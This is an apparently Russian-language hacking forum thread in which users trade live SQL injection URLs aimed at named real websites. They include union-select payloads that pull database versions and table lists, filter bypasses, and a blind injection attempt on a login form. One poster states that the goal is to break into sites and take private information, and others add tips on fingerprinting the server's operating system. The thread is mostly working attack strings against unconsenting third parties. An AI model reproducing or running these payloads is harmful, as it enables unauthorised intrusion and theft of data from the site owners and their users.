Code: http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- выводиться поле 2, при попытки вместо 2 написать version() или user() - ошибка vesion(): mysqld-5.0.18-nt Code: http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables-- как сделать вывод???
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14-- Одно и тоже на каждой странице темы=\
А можно ли счесть за уязвимость то что когда регишься на сайте тот логин который ты ввёл будет отоброжаться в ссылке так www.site.ru/users/твойлогин ?
на первом кажет нету инекций второй Code: http://www.glassfactory.co.jp/shop/detail.php?id=-5+union+select+TABLENAME+from+PG_TABLES+LIMIT+1+OFFSET+1-- есть такая тема
sabe первый http://shop.m-matching.jp/chara/prd_detail.php?ID=10001060999999999999+union+select+1,2,3,4,version(),null,null,null,null,111,1212,13,14,null,null-- второй так вывод лучше http://www.glassfactory.co.jp/shop/detail.php?id=-5+union+select+1,null,TABLENAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+PG_TABLES-- Обе PostgreSQL
помогите раскрутить , в запросе походу идет фильтр на все что только можно, почти http://www.myreductil.com/buynow.php?pack_id=-1%20union%20select%201,22-2,333,4444,55,6,7,8,99,23,11,12,13,14,15,16,17%20from%20products/* умножение сложение в некоторых колонках работает , а вот банальный вывод версии мускула никак не проходит , гляньте кто шарит плиз?
Скобки ему не нравятся http://www.myreductil.com/buynow.php?pack_id=11+and+1=2+union+select+1,22,3,4,5,6,7,8,9,0,11,@@version,13,14,15,16,17/*
Здравствуйте расскажите мне пожалуйста про эту штуку Blind SQL/XPath injection http://l2just.net/index.php?login=submit+and+31337-31337=0+--+&login_name=root&login_password=%2E%2E%2E%2E%2E%2E а что дальше делать незнаю помогите пожалуйста!
http://www.museum.ru/gmii/news.asp?id=-1%27 Ну не понимаю я как с MSSQL работать. Мб помогете. тиц 13000 PR 5
вот нашел Blind SQL/XPath injection http://l2just.net/index.php?login=submit+and+31337-31337=0+--+&login_name=root&login_password=%2E%2E%2E%2E%2E%2E что дальше делать непойму скажите плз!
В MySQL существуют системные переменные: @@basedir @@datadir @@tmpdir @@version_compile_os последняя - ось
us, вообще-то это приватная инфо, которая равносильна знанию (а может и покруче) version() при sql-inj. Вывод - сначала надо сайтик заломать, потом получать приватную инфо и наслаждаться рез-тами ЗЫЖ Раздел вроде как "Уязвимости называется" - уязвимости, ведущие ко взлому, получению приватной инфы, дальше делай выводы сам Удачи В данном случае эта инфа тебе поможет только если ты нашел sql-inj на сайте, подобрал кол-во колонок и узнал хотя бы version() БД
diznt nmap -0 или любой сканер,способный на это, или снятие баннеров, или просто тупо вбей site.ru/index.php site.ru/index.PHP винде пофиг на регистр, или по ошибкам, всякое бывает, это вобщем целая история.... способов куча
diznt, пусть браузер выдаст окно ошибки, внизу увидишь название системы, версию сервера и т.п., но не факт, что все - истина
